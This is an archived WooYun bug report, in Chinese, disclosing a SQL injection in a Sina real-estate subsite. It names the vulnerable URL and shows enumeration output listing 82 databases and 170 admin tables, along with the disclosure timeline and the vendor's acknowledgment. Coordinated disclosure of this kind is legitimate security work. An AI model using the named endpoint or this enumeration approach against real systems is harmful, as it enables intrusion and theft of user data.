乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-26: 细节已通知厂商并且等待厂商处理中 2013-09-26: 厂商已经确认,细节仅向厂商公开 2013-10-06: 细节向核心白帽子及相关领域专家公开 2013-10-16: 细节向普通白帽子公开 2013-10-26: 细节向实习白帽子公开 2013-11-10: 细节向公众公开
新浪某分站SQL注入漏洞,好多库啊。
地址:http://sz.esf.sina.com.cn/ad?p=100
available databases [82]:[*] information_schema[*] mysql[*] performance_schema[*] shop_admin[*] shop_bj[*] shop_bozhou[*] shop_cangzhou[*] shop_cc[*] shop_cd[*] shop_chaohu[*] shop_chuzhou[*] shop_cq[*] shop_cs[*] shop_cz[*] shop_datong[*] shop_dg[*] shop_dl[*] shop_fs[*] shop_fushun[*] shop_fz[*] shop_gg[*] shop_gl[*] shop_gy[*] shop_gz[*] shop_haikou[*] shop_heb[*] shop_hf[*] shop_hhht[*] shop_hk[*] shop_huangshan[*] shop_huizhou[*] shop_hz[*] shop_jiangmen[*] shop_jinzhong[*] shop_jn[*] shop_klmy[*] shop_km[*] shop_ks[*] shop_lanzhou[*] shop_liuzhou[*] shop_luoyang[*] shop_lw[*] shop_nb[*] shop_nc[*] shop_nj[*] shop_nn[*] shop_nt[*] shop_pzh[*] shop_qd[*] shop_qhd[*] shop_quanzhou[*] shop_sanya[*] shop_sh[*] shop_sjz[*] shop_suzh[*] shop_suzhou[*] shop_sy[*] shop_sz[*] shop_tangshan[*] shop_tj[*] shop_tongling[*] shop_ty[*] shop_weifang[*] shop_weihai[*] shop_wh[*] shop_wuhu[*] shop_wx[*] shop_xian[*] shop_xm[*] shop_xz[*] shop_yangjiang[*] shop_yangzhou[*] shop_yichang[*] shop_yt[*] shop_yuncheng[*] shop_zb[*] shop_zhengzhou[*] shop_zhongshan[*] shop_zhuhai[*] shop_zjk[*] shop_zz[*] test
Database: shop_admin[170 tables]+-------------------------------+| ad_list || ad_name || ad_time || apply_register || article_tag || assign_log || auth_package || bargain_cache || bargain_info || bargain_info_log || bargain_online || bargain_online_list || bargain_package_list || bargain_receipt || buy_intention || check_log || check_log_bak || community_bargain_list || community_distanceset || community_distanceset_list || community_repair || community_source_ad || community_stype || community_stype_set || community_stype_set_list || community_tmp || community_weibo || community_weibo_bj || community_weibo_sh || community_weibo_tj || company_project_relation || confirm_appointment_log || count_house_avgprice || credit_log || dict_districtblock || dict_districtblock_merge_logs || es_community_baidu || es_home_compare || es_home_gujia || es_home_spider || es_pinzhuan_delete || es_pinzhuan_keyword || es_pinzhuan_status || feat_bargain_account || feat_baseinfo || feat_bonus || feat_kpiinfo || feat_ratio_config || feat_sysuser || fy_agentphone || gujia_nohouse || gujia_report || gujia_report_result || gujia_user || hd_reserve_sms_log || help || help_article || help_content || help_left || help_suggest || help_tag || helpsort || home_agent_relation || house_active_statistics || htlp || job_distribute || job_log || leju_house || lost_mobile || mobile_pocketagent_bound || mobile_sendmessage_log || my_maintain || navigation || new_building || new_company_project || new_mail_log || new_mobilecode || new_order_record || new_order_step || new_plan || new_plan_bak || new_plan_relation || new_project_list || new_user_contact || plan_white_list || property_developer || rec_house || rec_house_collection || rec_project || renchou || reply || sale_done || sale_package || shop_fitmentinfo || sp_agent_apply_log || sp_agentphone || sp_app_list || sp_app_model || sp_app_model_list || sp_app_type || sp_city || sp_dict || sp_house_import || sp_keep_ex_phone || sp_lime || sp_log || sp_login_log || sp_luck_list || sp_mobile_send || sp_notice || sp_pay_log || sp_permission || sp_phone_log || sp_project_view || sp_pwd_log || sp_role || sp_role_permission || sp_service_phone || sp_sys_user || sp_sys_userpermission || sp_user || sp_user_attention || sp_user_bj || sp_user_comment || sp_user_community || sp_user_community_active || sp_user_community_ext || sp_user_community_operate_log || sp_user_data || sp_user_del_log || sp_user_del_pic || sp_user_ext || sp_user_link || sp_user_loginlog || sp_user_luck || sp_user_person || sp_user_pic || sp_user_pic_data || sp_user_pic_data_tmp || sp_user_recover || sp_user_setting || sp_user_subscription || sp_weixin_log || sp_weixin_user || sp_yxgw || study_admin || study_reply || study_sys || study_topic || sys_log || sys_variable || text_filter || tmp_tg_baidu || tmp_user || topic || user_book || user_book_info || user_relation || valuation_house_log || valuation_house_report || valuation_no_data || ws_admin_role || ws_agent_admin_users || ws_fy_cell || ws_fy_housetype || ws_fy_project || ws_partner || ws_pic_housetype || ws_project_list || ws_sp_user |+-------------------------------+
见详细说明
管理员会修复的。
危害等级:中
漏洞Rank:10
确认时间:2013-09-26 14:23
感谢关注新浪安全,已安排人员进行修复~
暂无